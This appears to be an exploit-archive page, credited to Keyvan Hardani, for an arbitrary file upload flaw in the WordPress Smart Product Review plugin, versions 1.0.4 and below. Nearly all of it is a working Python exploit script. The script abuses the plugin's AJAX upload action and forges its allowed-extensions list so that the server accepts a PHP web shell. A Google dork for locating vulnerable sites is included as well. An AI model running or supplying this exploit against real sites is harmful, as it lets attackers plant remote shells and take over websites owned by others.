Authored by Keyvan Hardani

WordPress Smart Product Review plugin versions 1.0.4 and below suffer from a remote shell upload vulnerability.

# Exploit Title: WordPress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload
# Google Dork: inurl: /wp-content/plugins/smart-product-review/
# Date: 16/11/2021
# Exploit Author: Keyvan Hardani
# Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/
# Version: <= 1.0.4
# Tested on: Kali Linux

import os.path
from os import path
import json
import requests;
import time
import sys

def banner():
    animation = "|/-"
    for i in range(20):
        time.sleep(0.1)
        sys.stdout.write("r" + animation[i % len(animation)])
        sys.stdout.flush()
        #do something
    print("Smart Product Review 1.0.4 - Arbitrary File Upload")
    print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)")

def usage():
  print("Usage: python3 exploit.py [target url] [your shell]")
  print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")

def vuln_check(uri):
  response = requests.get(uri)
  raw = response.text

  if ("No script kiddies please!!" in raw):
    return False;
  else:
    return True;

def main():

  banner()
  if(len(sys.argv) != 3):
    usage();
    sys.exit(1);

  base = sys.argv[1]
  file_path = sys.argv[2]

  ajax_action = 'sprw_file_upload_action'
  admin = '/wp-admin/admin-ajax.php';

  uri = base + admin + '?action=' + ajax_action ;
  check = vuln_check(uri);

  if(check == False):
    print("(*) Target not vulnerable!");
    sys.exit(1)

  if( path.isfile(file_path) == False):
    print("(*) Invalid file!")
    sys.exit(1)

  files = {'files[]' : open(file_path)}
  data = {
  "allowedExtensions[0]" : "jpg",
    "allowedExtensions[1]" : "php4",
    "allowedExtensions[2]" : "phtml",
    "allowedExtensions[3]" : "png",
  "qqfile" : "files",
    "element_id" : "6837",
    "sizeLimit" : "12000000",
    "file_uploader_nonce" : "2b102311b7"
  }
  print("Uploading Shell...");
  response = requests.post(uri, files=files, data=data )
  file_name = path.basename(file_path)
  if("ok" in response.text):
    print("Shell Uploaded!")
    print("Shell URL on your Review/Comment");
  else:
    print("Shell Upload Failed")
    sys.exit(1)

main();

RELATED ARTICLESMORE FROM AUTHOR